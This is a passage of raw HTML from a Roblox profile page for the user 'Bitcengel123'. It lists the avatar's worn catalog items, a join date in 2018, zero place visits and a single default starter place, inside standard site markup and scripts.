class=input-addon-btn type=submit> <span class=icon-nav-search></span> </button></div></div><ul data-toggle=dropdown-menu class=dropdown-menu role=menu><li class="rbx-navbar-search-option rbx-clickable-li selected" data-searchurl="https://www.roblox.com/search/users?keyword="><a class=rbx-navbar-search-anchor href="https://www.roblox.com/search/users?keyword="> <span class=rbx-navbar-search-text> Search "<span class=rbx-navbar-search-string></span>" in Players</span> </a><li class="rbx-navbar-search-option rbx-clickable-li" data-searchurl="https://www.roblox.com/games/?Keyword="><a class=rbx-navbar-search-anchor href="https://www.roblox.com/games/?Keyword="> <span class=rbx-navbar-search-text> Search "<span class=rbx-navbar-search-string></span>" in Games</span> </a><li class="rbx-navbar-search-option rbx-clickable-li" data-searchurl="https://www.roblox.com/catalog/browse.aspx?CatalogContext=1&amp;Keyword="><a class=rbx-navbar-search-anchor href="https://www.roblox.com/catalog/browse.aspx?CatalogContext=1&amp;Keyword="> <span class=rbx-navbar-search-text> Search "<span class=rbx-navbar-search-string></span>" in Catalog</span> </a><li class="rbx-navbar-search-option rbx-clickable-li" data-searchurl="https://www.roblox.com/search/groups?keyword="><a class=rbx-navbar-search-anchor href="https://www.roblox.com/search/groups?keyword="> <span class=rbx-navbar-search-text> Search "<span class=rbx-navbar-search-string></span>" in Groups</span> </a><li class="rbx-navbar-search-option rbx-clickable-li" data-searchurl="https://www.roblox.com/develop/library?CatalogContext=2&amp;Category=6&amp;Keyword="><a class=rbx-navbar-search-anchor href="https://www.roblox.com/develop/library?CatalogContext=2&amp;Category=6&amp;Keyword="> <span class=rbx-navbar-search-text> Search "<span class=rbx-navbar-search-string></span>" in Library</span> </a></ul></div><div class="navbar-right rbx-navbar-right"><ul class="nav navbar-right rbx-navbar-right-nav" data-display-opened=False><li class=signup-button-container><a id=sign-up-button class="rbx-navbar-signup nav-menu-title signup-button" href=https://www.roblox.com/account/signupredir>Sign Up</a><li class=login-action><a class="roblox-popover rbx-navbar-login nav-menu-title rbx-menu-item" data-bind=login-dropdown data-container=login-dropdown-container> Log In </a><div id=login-dropdown data-hidden-class-name=invisible class="roblox-popover-content bottom invisible login-dropdown"><div id=login-dropdown-container class="roblox-popover-container login-dropdown-container"><div class=arrow></div><div id=login-container class=login-container><div login-form context=loginDropdown is-facebook-sign-in-enabled=true use-facebook-redirect=true redirect-to-login-page-when-username-is-required=true is-login-fun-captcha-enabled=true is-always-captcha-login-enabled=false is-captcha-v2-component-for-login-enabled=true is-bedev2-captcha-for-web-login-enabled=true></div></div></div></div><li class=rbx-navbar-right-search data-toggle=toggle-search><a class=rbx-menu-icon> <span class=icon-nav-search-white></span> </a></ul></div><ul class="nav rbx-navbar hidden-md hidden-lg col-xs-12"><li class=cursor-pointer><a class="font-header-2 nav-menu-title text-header" href=https://www.roblox.com/games>Games</a><li class=cursor-pointer><a class="font-header-2 nav-menu-title text-header" href="https://www.roblox.com/catalog/">Avatar Shop</a><li class=cursor-pointer><a class="font-header-2 nav-menu-title text-header" href=https://www.roblox.com/develop>Create</a><li class=cursor-pointer><a class="font-header-2 buy-robux nav-menu-title text-header" href="https://www.roblox.com/upgrades/robux?ctx=nav">Robux</a></ul></div></div><div id=i18nForAmazonShopSwitch data-is-i18n-enabled-for-shop-amazon-dialog=true data-amazon-store-url="https://www.amazon.com/roblox?&amp;_encoding=UTF8&amp;tag=r05d13-20&amp;linkCode=ur2&amp;linkId=4ba2e1ad82f781c8e8cc98329b1066d0&amp;camp=1789&amp;creative=9325" style=display:none></div><script>var Roblox=Roblox||{};(function(){if(Roblox&&Roblox.Performance){Roblox.Performance.setPerformanceMark("navigation_end");}})();</script><div class=container-main id=container-main><script>if(top.location!=self.location){top.location=self.location.href;}</script><div class=alert-container><noscript><div><div class=alert-info role=alert>Please enable Javascript to use all the features on this site.</div></div></noscript><div class=alert-cookie-notice data-cookie-notice-timeout=20000>Roblox uses cookies to offer you a better experience. For further information, including information on how to withdraw consent and how to manage the use of cookies on Roblox, please refer to our <a href="https://www.roblox.com/info/privacy?locale=en_us">Privacy and Cookie Policy</a>.) <span class="icon-close cookie-law-notice-dismiss"></span></div></div><div class=content><div id=Leaderboard-Abp class="abp leaderboard-abp"><iframe name=Roblox_Profile_Top_728x90 allowtransparency=true frameborder=0 height=110 scrolling=no data-src="" src=https://www.roblox.com/user-sponsorship/1 width=728 data-js-adtype=iframead data-ad-slot=Roblox_Profile_Top_728x90></iframe></div><script>var Roblox=Roblox||{};Roblox.I18nData=Roblox.I18nData||{};Roblox.I18nData.isI18nEnabledForGroups=true;</script><div class=profile-container ng-modules="robloxApp, profile, angularLazyImg, peopleList, aliases, groupList "><div ng-controller=profileBaseController><script src="https://www.google.com/recaptcha/api.js?render=explicit" async defer></script><div class="section profile-header"><div class="section-content profile-header-content" ng-controller=profileHeaderController><script>var Roblox=Roblox||{};Roblox.ProfileHeaderData={"profileusername":"Bitcengel123","previoususernames":""};</script><div data-profileuserid=1731021798 data-friendscount=84 data-followerscount=84 data-followingscount=117 data-acceptfriendrequesturl="" data-incomingfriendrequestid=0 data-arefriends=false data-friendurl=https://www.roblox.com/users/1731021798/friends#!/friends data-incomingfriendrequestpending=false data-maysendfriendinvitation=false data-friendrequestpending=false data-sendfriendrequesturl="" data-removefriendrequesturl="" data-mayfollow=false data-isfollowing=false data-followurl="" data-unfollowurl="" data-canmessage=true data-messagesdisabled=false data-messageurl="/messages/compose?recipientId=1731021798" data-canbefollowed=false data-cantrade=false data-usenewtradespage=false data-isblockbuttonvisible=false data-getfollowscript="" data-ismorebtnvisible=false data-isvieweeblocked=false data-mayimpersonate=false data-mayupdatestatus=false data-updatestatusurl="" data-statustext="" data-statusdate="9/2/2018 4:08:22 PM" data-editstatusmaxlength=254 data-getfriendshipcounturl=https://api.roblox.com/user/get-friendship-count data-usefriendsapi=true data-ischatdisabledbyprivacysetting=false profile-header-data set-message-btn-display=setMessageBtnDisplay(layout) profile-header-layout=profileHeaderLayout class=hidden></div><div class=profile-header-top><div class="avatar avatar-headshot-lg card-plain profile-avatar-image"><span class="avatar-card-link avatar-image-link"> <thumbnail-2d ng-if=profileHeaderLayout.profileUserId class="avatar-card-image profile-avatar-thumb" thumbnail-target-id=profileHeaderLayout.profileUserId thumbnail-type=thumbnailTypes.avatarHeadshot> <span ng-class="$ctrl.getCssClasses()" class="thumbnail-2d-container" thumbnail-type="avatarHeadshot" thumbnail-target-id="47828"> <!-- ngIf: $ctrl.thumbnailUrl && !$ctrl.isLazyLoadingEnabled() --><img ng-if="$ctrl.thumbnailUrl &amp;&amp; !$ctrl.isLazyLoadingEnabled()" ng-src="https://tr.rbxcdn.com/a6b6462e1eb3d111b4a16f09f17d1759/150/150/AvatarHeadshot/Png" thumbnail-error="$ctrl.setThumbnailLoadFailed" ng-class="{'loading': $ctrl.thumbnailUrl &amp;&amp; !isLoaded }" image-load="" class="ng-scope ng-isolate-scope" src="https://tr.rbxcdn.com/a6b6462e1eb3d111b4a16f09f17d1759/150/150/AvatarHeadshot/Png"><!-- end ngIf: $ctrl.thumbnailUrl && !$ctrl.isLazyLoadingEnabled() --> <!-- ngIf: $ctrl.thumbnailUrl && $ctrl.isLazyLoadingEnabled() --> </span> </thumbnail-2d> </span><script>$(".profile-avatar-thumb img").on('load',function(){if(Roblox&&Roblox.Performance){Roblox.Performance.setPerformanceMark("head_avatar");}});</script></div><div class=header-caption><div class=header-names><div class=header-title><h2 ng-non-bindable class="profile-name text-overflow">Bitcengel123</h2><h3 ng-non-bindable class="profile-name text-overflow">Bitcengel123</h3></div></div><div user-status></div><div class=header-details><ul class=details-info><li><div class="text-label font-caption-header" ng-bind="'Label.Friends' | translate"></div><a class=text-name href=https://www.roblox.com/users/1731021798/friends#!/friends ng-cloak> <span class=font-header-2 title="{{ profileHeaderLayout.friendsCount | number }}" ng-bind="profileHeaderLayout.friendsCount | abbreviate"></span> </a><li><div class="text-label font-caption-header" ng-bind="'Label.Followers' | translate"></div><a class=text-name href=https://www.roblox.com/users/1731021798/friends#!/followers ng-cloak> <span class=font-header-2 title="{{ profileHeaderLayout.followersCount | number }}" ng-bind="profileHeaderLayout.followersCount | abbreviate"></span> </a><li><div class="text-label font-caption-header" ng-bind="'Label.Following' | translate"></div><a class=text-name href=https://www.roblox.com/users/1731021798/friends#!/following ng-cloak> <span class=font-header-2 title="{{ profileHeaderLayout.followingsCount | number }}" ng-bind="profileHeaderLayout.followingsCount | abbreviate"></span> </a></ul><ul class="details-actions desktop-action"><li class=btn-friends ng-if=!profileHeaderLayout.areFriends ng-cloak><button ng-if=profileHeaderLayout.incomingFriendRequestPending ng-cloak class=btn-control-md data-target-url="" data-friend-request-id=0 data-target-user-id=1731021798 data-friends-url=https://www.roblox.com/users/1731021798/friends#!/friends ng-click=acceptFriendRequest() ng-bind="'Action.Accept' | translate"></button> <button ng-if="!profileHeaderLayout.incomingFriendRequestPending
                                            &amp;&amp; profileHeaderLayout.maySendFriendInvitation" ng-cloak class=btn-control-md ng-click=sendFriendRequest() ng-bind="'Action.AddFriend' | translate"></button> <button ng-if="!profileHeaderLayout.incomingFriendRequestPending
                                        &amp;&amp; !profileHeaderLayout.maySendFriendInvitation
                                        &amp;&amp; profileHeaderLayout.friendRequestPending" ng-cloak class="btn-control-md disabled" ng-bind="'Action.Pending' | translate"></button> <button ng-if="!profileHeaderLayout.incomingFriendRequestPending
                                        &amp;&amp; !profileHeaderLayout.maySendFriendInvitation
                                        &amp;&amp; !profileHeaderLayout.friendRequestPending" ng-cloak class="btn-control-md disabled" ng-bind="'Action.AddFriend' | translate"></button><li class=btn-friends ng-if=profileHeaderLayout.areFriends ng-cloak><button class=btn-alert-md id=unfriend-btn data-target-url="" data-target-user-id=1731021798 ng-click=removeFriend() ng-bind="'Action.Unfriend' | translate"></button><li class=btn-messages id=profile-message-btn><button class=btn-control-md ng-disabled=!profileHeaderLayout.enableMessageBtn ng-show=profileHeaderLayout.showMessageBtn ng-click=sendMessage() ng-cloak ng-bind="'Action.Message' | translate"></button><li class=btn-messages id=profile-chat-btn ng-show=profileHeaderLayout.showChatBtn><button class=btn-control-md ng-click=chat() ng-cloak ng-bind="'Action.Chat' | translate"></button><li class=btn-join-game ng-if=profileHeaderLayout.canBeFollowed><button class="profile-join-game btn-primary-md" ng-cloak ng-bind="'Action.JoinGame' | translate"></button></ul><ul class="details-actions mobile-action" ng-class="{'three-item-list': profileHeaderLayout.canBeFollowed}"><li class=btn-friends ng-if=!profileHeaderLayout.areFriends ng-cloak><a ng-if=profileHeaderLayout.incomingFriendRequestPending ng-cloak data-target-url="" data-friend-request-id=0 data-target-user-id=1731021798 data-friends-url=https://www.roblox.com/users/1731021798/friends#!/friends class=action-add-friend ng-click=acceptFriendRequest()><div class=icon-accept-friend></div><div class="text-label small" ng-bind="'Action.Accept' | translate"></div></a> <a ng-if="!profileHeaderLayout.incomingFriendRequestPending &amp;&amp; profileHeaderLayout.maySendFriendInvitation" class=action-add-friend ng-cloak ng-click=sendFriendRequest()><div class=icon-add-friend></div><div class="text-label small" ng-bind="'Action.AddFriend' | translate"></div></a> <a ng-if="!profileHeaderLayout.incomingFriendRequestPending
                                        &amp;&amp; !profileHeaderLayout.maySendFriendInvitation
                                        &amp;&amp; profileHeaderLayout.friendRequestPending" ng-cloak class=action-friend-pending><div class=icon-friend-pending></div><div class="text-label small" ng-bind="'Action.Pending' | translate"></div></a> <a ng-if="!profileHeaderLayout.incomingFriendRequestPending
                                        &amp;&amp; !profileHeaderLayout.maySendFriendInvitation
                                        &amp;&amp; !profileHeaderLayout.friendRequestPending" ng-cloak class=action-friend-pending><div class=icon-friend-pending></div><div class="text-label small" ng-bind="'Action.AddFriend' | translate"></div></a><li class=btn-friends ng-if=profileHeaderLayout.areFriends ng-cloak><a data-target-url="" data-target-user-id=1731021798 ng-mouseenter="hover = true" ng-mouseleave="hover =false" ng-class="{'btn-unfollow': hover}" ng-click=removeFriend() class=action-remove-friend><div class=icon-remove-friend></div><div class="text-label small" ng-bind="'Action.Unfriend' | translate"></div></a><li class="btn-messages center-icon" id=profile-message-icon ng-if=profileHeaderLayout.showMessageBtn ng-cloak><div ng-if=!profileHeaderLayout.enableMessageBtn class=action-message-disabled ng-cloak><div class=icon-send-message-disabled></div><div class="text-label small" ng-bind="'Action.Message' | translate"></div></div><a ng-if=profileHeaderLayout.enableMessageBtn ng-click=sendMessage() class=action-message ng-cloak><div class=icon-send-message></div><div class="text-label small" ng-bind="'Action.Message' | translate"></div></a><li class="btn-messages center-icon" id=profile-chat-icon ng-if=profileHeaderLayout.showChatBtn ng-cloak><div class=action-message-disabled ng-click=chat() ng-cloak><div class=icon-start-chat></div><div class="text-label small" ng-bind="'Action.Chat' | translate"></div></div><li class="btn-join-game last-icon" ng-if=profileHeaderLayout.canBeFollowed><a class="profile-join-game action-join-game" ng-cloak><div class=icon-join-game></div><div class="text-label small" ng-bind="'Action.JoinGame' | translate"></div></a></ul></div></div><div class=mobile-user-status user-status></div></div><p ng-show=profileHeaderLayout.hasError ng-cloak class="text-error header-details-error" ng-bind=profileHeaderLayout.errorMsg><div id=profile-header-more class=profile-header-more ng-show=profileHeaderLayout.isMoreBtnVisible ng-cloak><a id=popover-link class=rbx-menu-item data-toggle=popover data-bind=profile-header-popover-content> <span class=icon-more></span> </a><div id=popover-content class=rbx-popover-content data-toggle=profile-header-popover-content><ul class=dropdown-menu role=menu><li ng-show=profileHeaderLayout.showMessageLink id=profile-message-in-menu><a tabindex=0 role=button id=profile-message ng-click=sendMessage() ng-cloak ng-bind="'Action.Message' | translate"> </a><li ng-show=profileHeaderLayout.mayFollow ng-cloak><a tabindex=0 role=button ng-bind="profileHeaderLayout.isFollowing ? 'Action.Unfollow' : 'Action.Follow' | translate" ng-click=follow() id=profile-follow-user ng-cloak></a><li ng-show=profileHeaderLayout.canTrade ng-cloak><a tabindex=0 role=button ng-click=tradeItems() id=profile-trade-items ng-bind="'Action.TradeItems' | translate"></a><li ng-show=profileHeaderLayout.isBlockButtonVisible ng-cloak><a tabindex=0 role=button ng-bind="!profileHeaderLayout.isVieweeBlocked ? 'Action.BlockUser' : 'Action.UnblockUser'| translate" ng-click=blockUser() id=profile-block-user ng-cloak></a><li><a tabindex=0 role=button href="https://www.roblox.com/users/1731021798/inventory/" ng-bind="'Action.Inventory' | translate"></a></ul></div><script>$(function(){$(".details-actions, .mobile-details-actions").on("click",".profile-join-game",function(e){e.preventDefault();e.stopPropagation();play_placeId=0;try{;var referrerId=Roblox.UrlParser?Roblox.UrlParser.getParameterValueByName("rbxp"):null;if(Roblox.GamePlayEvents){var context=Roblox.GamePlayEvents.contextCategories.joinUser;Roblox.GamePlayEvents.SendGamePlayIntent(context,play_placeId,referrerId);}}
catch(e){if(GoogleAnalyticsEvents&&GoogleAnalyticsEvents.FireEvent){GoogleAnalyticsEvents.FireEvent(["Protocol","Launch Failure","follow",0]);}}
return false;});});</script></div></div></div><div ng-include="'system-feedback'"></div><div class=rbx-tabs-horizontal><ul id=horizontal-tabs class="nav nav-tabs" role=tablist profile-tab-click><li class="rbx-tab active"><a class=rbx-tab-heading href=#about id=tab-about> <span class=text-lead>About</span> <span class=rbx-tab-subtitle></span> </a><li class=rbx-tab><a class=rbx-tab-heading href=#creations id=tab-creations> <span class=text-lead>Creations</span> <span class=rbx-tab-subtitle></span> </a></ul><div class="tab-content rbx-tab-content"><div class="tab-pane active" id=about><div class="section profile-about" ng-controller=profileUtilitiesController><div class=container-header><h3>About</h3></div><div class="section-content remove-panel"><div id=aliases-container><div class=border-top ng-hide=isAliasesLoaded><span class="spinner spinner-default"></span></div><div aliases-container></div></div><div class="border-top profile-about-footer"><a href="https://www.roblox.com/abusereport/UserProfile?id=1731021798&amp;redirectUrl=https%3A%2F%2Fwww.roblox.com%2Fusers%2F1731021798%2Fprofile" class="abuse-report-link abuse-report-modal"> <span class=text-error ng-bind="'Label.ReportAbuse' | translate"></span> </a></div></div></div><div class="section profile-avatar"><div id=use-dynamic-thumbnail-lighting class=hidden data-use-dynamic-thumbnail-lighting=False></div><div class=container-header><h3 ng-bind="'Heading.CurrentlyWearing' | translate"></h3></div><div class="col-sm-6 section-content profile-avatar-left" ng-non-bindable><div id=UserAvatar class=thumbnail-holder data-reset-enabled-every-page data-3d-thumbs-enabled data-url="/thumbnail/user-avatar?userId=1731021798&amp;thumbnailFormatId=124&amp;width=300&amp;height=300" style=width:300px;height:300px><span class=thumbnail-span></span> <span class="thumbnail-span-original hidden" data-3d-url="/avatar-thumbnail-3d/json?userId=1731021798" data-orig-retry-url="/avatar-thumbnail/json?userId=1731021798&amp;width=352&amp;height=352&amp;format=png"><img alt=Bitcengel123 src=https://tr.rbxcdn.com/34a2bbba80ce2a31f2d9d67572076757/352/352/Avatar/Png></span> <span class="enable-three-dee btn-control btn-control-lg">3D</span></div></div><div class="col-sm-6 section-content profile-avatar-right"><div class=profile-avatar-mask><div class=profile-accoutrements-container ng-controller=profileAccoutrementsController><div data-numberofaccoutrements=10 data-accoutrementsperpage=8 data-intouchscreen=false profile-accoutrements-data profile-accoutrements-layout=profileAccoutrementsLayout class=hidden></div><div id="accoutrements-slider" class="profile-accoutrements-slider ng-isolate-scope" profile-accoutrements-slider="" profile-accoutrements-layout="profileAccoutrementsLayout" style="width: 665px;"><ul class="accoutrement-items-container"><li class="accoutrement-item" ng-non-bindable=""><a href="https://www.roblox.com/catalog/188004500/CW-Ultimate-Amethyst-Addiction"> <img title="CW Ultimate: Amethyst Addiction" alt="CW Ultimate: Amethyst Addiction" class="accoutrement-image" src="https://tr.rbxcdn.com/c2787b37dfe66a29dc723f423d97b82d/100/100/Hat/Png"><div class="asset-restriction-icon"><span class="icon-label icon-limited-label"></span></div></a></li><li class="accoutrement-item" ng-non-bindable=""><a href="https://www.roblox.com/catalog/1029025/The-Classic-ROBLOX-Fedora"> <img title="The Classic ROBLOX Fedora" alt="The Classic ROBLOX Fedora" class="accoutrement-image" src="https://tr.rbxcdn.com/696bac0039a7b5d5fe2e9eb4a4760114/100/100/Hat/Png"><div class="asset-restriction-icon"><span class="icon-label icon-limited-label"></span></div></a></li><li class="accoutrement-item" ng-non-bindable=""><a href="https://www.roblox.com/catalog/4823059647/Officer-Fatigues-Bottom"> <img title="Officer Fatigues Bottom" alt="Officer Fatigues Bottom" class="accoutrement-image" src="https://tr.rbxcdn.com/f60ffbeccc5f7cb16d670014dbecff5c/100/100/Pants/Png"><div class="asset-restriction-icon"><span class="icon-label icon--label"></span></div></a></li><li class="accoutrement-item" ng-non-bindable=""><a href="https://www.roblox.com/catalog/4823058286/Officer-Fatigues-Top"> <img title="Officer Fatigues Top" alt="Officer Fatigues Top" class="accoutrement-image" src="https://tr.rbxcdn.com/0155ac067139e4bdeff8f7937d8043b7/100/100/Shirt/Png"><div class="asset-restriction-icon"><span class="icon-label icon--label"></span></div></a></li><li class="accoutrement-item" ng-non-bindable=""><a href="https://www.roblox.com/catalog/5188809894/Pwner"> <img title="Pwner" alt="Pwner" class="accoutrement-image" src="https://t5.rbxcdn.com/a12a95f682972f76ed3b619125c1fd59"><div class="asset-restriction-icon"><span class="icon-label icon--label"></span></div></a></li><li class="accoutrement-item" ng-non-bindable=""><a href="https://www.roblox.com/catalog/15727015/Eye-Poppers"> <img title="Eye Poppers" alt="Eye Poppers" class="accoutrement-image" src="https://tr.rbxcdn.com/6f6856355caffc42ad7c5d01fde7dc8a/100/100/Hat/Png"><div class="asset-restriction-icon"><span class="icon-label icon--label"></span></div></a></li><li class="accoutrement-item" ng-non-bindable=""><a href="https://www.roblox.com/catalog/7074764/Chill"> <img title="Chill" alt="Chill" class="accoutrement-image" src="https://tr.rbxcdn.com/68f0cd0092319e1894e6c9b88059c1ef/100/100/Face/Png"><div class="asset-restriction-icon"><span class="icon-label icon--label"></span></div></a></li></ul></div></a><li class=accoutrement-item ng-non-bindable><a href=https://www.roblox.com/catalog/144076358/Blue-and-Black-Motorcycle-Shirt> <img title="Blue and Black Motorcycle Shirt" alt="Blue and Black Motorcycle Shirt" class=accoutrement-image src=https://tr.rbxcdn.com/98a7c3b3aa587228ba6c46a087f63bf1/100/100/Shirt/Png><div class=asset-restriction-icon><span class="icon-label icon--label"></span></div></a><li class=accoutrement-item ng-non-bindable><a href=https://www.roblox.com/catalog/144076760/Dark-Green-Jeans> <img title="Dark Green Jeans" alt="Dark Green Jeans" class=accoutrement-image src=https://tr.rbxcdn.com/b7c13d60423ed16ce73950964bc98bdb/100/100/Pants/Png><div class=asset-restriction-icon><span class="icon-label icon--label"></span></div></a><li class=accoutrement-item ng-non-bindable><a href=https://www.roblox.com/catalog/144075659/Smile> <img title=Smile alt=Smile class=accoutrement-image src=https://tr.rbxcdn.com/0df72418831062eca92ec6366c2cb4bb/100/100/Face/Png><div class=asset-restriction-icon><span class="icon-label icon--label"></span></div></a><li class=accoutrement-item ng-non-bindable><a href=https://www.roblox.com/catalog/86500054/Man-Left-Arm> <img title="Man Left Arm" alt="Man Left Arm" class=accoutrement-image src=https://tr.rbxcdn.com/aef041600981cb63945732738aafa89c/100/100/BodyPart_LeftArm/Png><div class=asset-restriction-icon><span class="icon-label icon--label"></span></div></a><li class=accoutrement-item ng-non-bindable><a href=https://www.roblox.com/catalog/86500078/Man-Right-Leg> <img title="Man Right Leg" alt="Man Right Leg" class=accoutrement-image src=https://tr.rbxcdn.com/0f115b15c2fa52d3d3d9971356d7a42f/100/100/BodyPart_RightLeg/Png><div class=asset-restriction-icon><span class="icon-label icon--label"></span></div></a><li class=accoutrement-item ng-non-bindable><a href=https://www.roblox.com/catalog/86500036/Man-Right-Arm> <img title="Man Right Arm" alt="Man Right Arm" class=accoutrement-image src=https://tr.rbxcdn.com/93b09df193f45a68e577b1264d35c193/100/100/BodyPart_RightArm/Png><div class=asset-restriction-icon><span class="icon-label icon--label"></span></div></a><li class=accoutrement-item ng-non-bindable><a href=https://www.roblox.com/catalog/86500008/Man-Torso> <img title="Man Torso" alt="Man Torso" class=accoutrement-image src=https://tr.rbxcdn.com/360d8ff61355a40d407b0a7f70314ab2/100/100/BodyPart_Torso/Png><div class=asset-restriction-icon><span class="icon-label icon--label"></span></div></a></ul><ul class=accoutrement-items-container><li class=accoutrement-item ng-non-bindable><a href=https://www.roblox.com/catalog/86500064/Man-Left-Leg> <img title="Man Left Leg" alt="Man Left Leg" class=accoutrement-image src=https://tr.rbxcdn.com/cde6707e9d4bc87cfe9b12ebf20b394b/100/100/BodyPart_LeftLeg/Png><div class=asset-restriction-icon><span class="icon-label icon--label"></span></div></a><li class=accoutrement-item ng-non-bindable><a href=https://www.roblox.com/catalog/86498048/Man-Head> <img title="Man Head" alt="Man Head" class=accoutrement-image src=https://tr.rbxcdn.com/982a001ebe3c92757d3930252bed1fb3/100/100/Head/Png><div class=asset-restriction-icon><span class="icon-label icon--label"></span></div></a></ul></div><div id=accoutrements-page class=profile-accoutrements-page-container profile-accoutrements-page profile-accoutrements-layout=profileAccoutrementsLayout><span class="profile-accoutrements-page hidden" ng-class="{'page-active': profileAccoutrementsLayout.currentPageNumber == 0}" ng-click=getAccoutrementsPage(0)></span> <span class="profile-accoutrements-page hidden" ng-class="{'page-active': profileAccoutrementsLayout.currentPageNumber == 1}" ng-click=getAccoutrementsPage(1)></span> <span class="profile-accoutrements-page hidden" ng-class="{'page-active': profileAccoutrementsLayout.currentPageNumber == 2}" ng-click=getAccoutrementsPage(2)></span> <span class="profile-accoutrements-page hidden" ng-class="{'page-active': profileAccoutrementsLayout.currentPageNumber == 3}" ng-click=getAccoutrementsPage(3)></span> <span class="profile-accoutrements-page hidden" ng-class="{'page-active': profileAccoutrementsLayout.currentPageNumber == 4}" ng-click=getAccoutrementsPage(4)></span> <span class="profile-accoutrements-page hidden" ng-class="{'page-active': profileAccoutrementsLayout.currentPageNumber == 5}" ng-click=getAccoutrementsPage(5)></span> <span class="profile-accoutrements-page hidden" ng-class="{'page-active': profileAccoutrementsLayout.currentPageNumber == 6}" ng-click=getAccoutrementsPage(6)></span> <span class="profile-accoutrements-page hidden" ng-class="{'page-active': profileAccoutrementsLayout.currentPageNumber == 7}" ng-click=getAccoutrementsPage(7)></span> <span class="profile-accoutrements-page hidden" ng-class="{'page-active': profileAccoutrementsLayout.currentPageNumber == 8}" ng-click=getAccoutrementsPage(8)></span> <span class="profile-accoutrements-page hidden" ng-class="{'page-active': profileAccoutrementsLayout.currentPageNumber == 9}" ng-click=getAccoutrementsPage(9)></span></div></div></div></div></div><div groups-showcase display-user-id=1731021798></div><div class=section ng-controller=profileUtilitiesController ng-init="getPlayerAssets('21')"><div ng-if="assets.length > 0" ng-include="'profile-player-assets'"></div></div><div class="section profile-statistics"><div class=container-header><h3>Statistics</h3></div><div class=section-content><ul class=profile-stats-container><li class=profile-stat><p class=text-label>Join Date<p class=text-lead>9/2/2018<li class=profile-stat><p class=text-label>Place Visits<p class=text-lead>0</li></ul></div></div></div><div class=tab-pane id=creations profile-empty-tab><div class=profile-game ng-controller=profileGridController ng-init="init('game-cards','game-container')" ng-class="{'section': !isGridOn,
                    'container-list': isGridOn}"><div class=container-header><h3 ng-non-bindable>Games</h3><div class=container-buttons><button class=profile-view-selector title="Slideshow View" type=button ng-click=updateDisplay(false) ng-class="{'btn-secondary-xs btn-generic-slideshow-xs': !isGridOn, 'btn-control-xs btn-generic-slideshow-xs': isGridOn}"> <span class=icon-slideshow ng-class="{'selected': !isGridOn}"></span> </button> <button class=profile-view-selector title="Grid View" type=button ng-click=updateDisplay(true) ng-class="{'btn-secondary-xs btn-generic-grid-xs': isGridOn, 'btn-control-xs btn-generic-grid-xs': !isGridOn}"> <span class=icon-grid ng-class="{'selected': isGridOn}"></span> </button></div></div><div ng-show=isGridOn class=game-grid><ul class="hlist game-cards" style="max-height: {{containerHeight}}px" horizontal-scroll-bar=loadMore()><div class=game-container data-index=0 ng-class="{'shown': 0 &lt; visibleItems}"><li class="list-item game-card game-tile"><div class=game-card-container><a href="https://www.roblox.com/games/refer?PlaceId=5268014740&amp;Position=1&amp;PageType=Profile" class=game-card-link><div class=game-card-thumb-container><img class=game-card-thumb data- src=https://t7.rbxcdn.com/aab11286f48891a68146a9d8327aeb1e alt="Bitcengel123's Place" thumbnail="{&#34;Final&#34;:true,&#34;Url&#34;:&#34;https://t7.rbxcdn.com/aab11286f48891a68146a9d8327aeb1e&#34;,&#34;RetryUrl&#34;:null,&#34;UserId&#34;:0,&#34;EndpointType&#34;:&#34;Avatar&#34;}" image-retry></div><div class="game-card-name game-name-title" title="Bitcengel123's Place" ng-non-bindable>Bitcengel123&#39;s Place</div><div class=game-card-info><span class="info-label icon-votes-gray"></span> <span class="info-label vote-percentage-label hidden">0%</span> <span class="info-label no-vote"></span> <span class="info-label icon-playing-counts-gray"></span> <span class="info-label playing-counts-label" title=0>0</span></div></a></div></li></div></ul><a ng-click=loadMore() class="btn btn-control-xs load-more-button" ng-show="1 > 6 * NumberOfVisibleRows">Load More</a></div><div id=games-switcher class="switcher slide-switcher games" ng-hide=isGridOn switcher itemscount=switcher.games.itemsCount currpage=switcher.games.currPage><ul class="slide-items-container switcher-items hlist"><li class="switcher-item slide-item-container active" ng-class="{'active': switcher.games.currPage == 0}" data-index=0><div class="col-sm-6 slide-item-container-left"><div class=slide-item-emblem-container><a href="https://www.roblox.com/games/refer?PlaceId=5268014740&amp;Position=1&amp;PageType=Profile"> <img class=slide-item-image src=https://t7.rbxcdn.com/aab11286f48891a68146a9d8327aeb1e data-src=https://t7.rbxcdn.com/aab11286f48891a68146a9d8327aeb1e data-emblem-id=5268014740 thumbnail="{&#34;Final&#34;:true,&#34;Url&#34;:&#34;https://t7.rbxcdn.com/aab11286f48891a68146a9d8327aeb1e&#34;,&#34;RetryUrl&#34;:null,&#34;UserId&#34;:0,&#34;EndpointType&#34;:&#34;Avatar&#34;}" image-retry> </a></div></div><div class="col-sm-6 slide-item-container-right games"><div class=slide-item-info><h2 class="text-overflow slide-item-name games" ng-non-bindable>Bitcengel123&#39;s Place</h2><p class="text-description para-overflow slide-item-description games" ng-non-bindable>This is your very first Roblox creation. Check it out, then make it your own with Roblox Studio!</div><div class=slide-item-stats><ul class=hlist><li class=list-item><div class="text-label slide-item-stat-title" ng-if=appMeta.isI18nEnabled ng-bind="'Label.Playing' | translate"></div><div class="text-label slide-item-stat-title" ng-if=!appMeta.isI18nEnabled>Playing</div><div class="text-lead slide-item-members-count">0</div><li class=list-item><div class="text-label slide-item-stat-title" ng-if=appMeta.isI18nEnabled ng-bind="'Label.Visits' | translate"></div><div class="text-label slide-item-stat-title" ng-if=!appMeta.isI18nEnabled>Visits</div><div class="text-lead text-overflow slide-item-my-rank games">0</div></ul></div></div></ul></div></div><div class=section ng-controller=profileUtilitiesController ng-init="getPlayerAssets('10')"><div ng-if="assets.length > 0" ng-include="'profile-player-assets'"></div></div><div class=section ng-controller=profileUtilitiesController ng-init="getPlayerAssets('11')"><div ng-if="assets.length > 0" ng-include="'profile-player-assets'"></div></div><div class="col-xs-12 section-content-off section-content" ng-if=profileLayout.userHasNoCreations><span ng-non-bindable>Bitcengel123 has no creations.</span></div></div></div></div></div></div><div><div class=profile-ads-container><div id=ProfilePageAdDiv1 class=profile-ad><iframe name=Roblox_Profile_Left_300x250 allowtransparency=true frameborder=0 height=270 scrolling=no data-src="" src=https://www.roblox.com/user-sponsorship/3 width=300 data-js-adtype=iframead data-ad-slot=Roblox_Profile_Left_300x250></iframe></div><div id=ProfilePageAdDiv2 class=profile-ad><iframe name=Roblox_Profile_Right_300x250 allowtransparency=true frameborder=0 height=270 scrolling=no data-src="" src=https://www.roblox.com/user-sponsorship/3 width=300 data-js-adtype=iframead data-ad-slot=Roblox_Profile_Right_300x250></iframe></div></div></div></div></div><footer class=container-footer 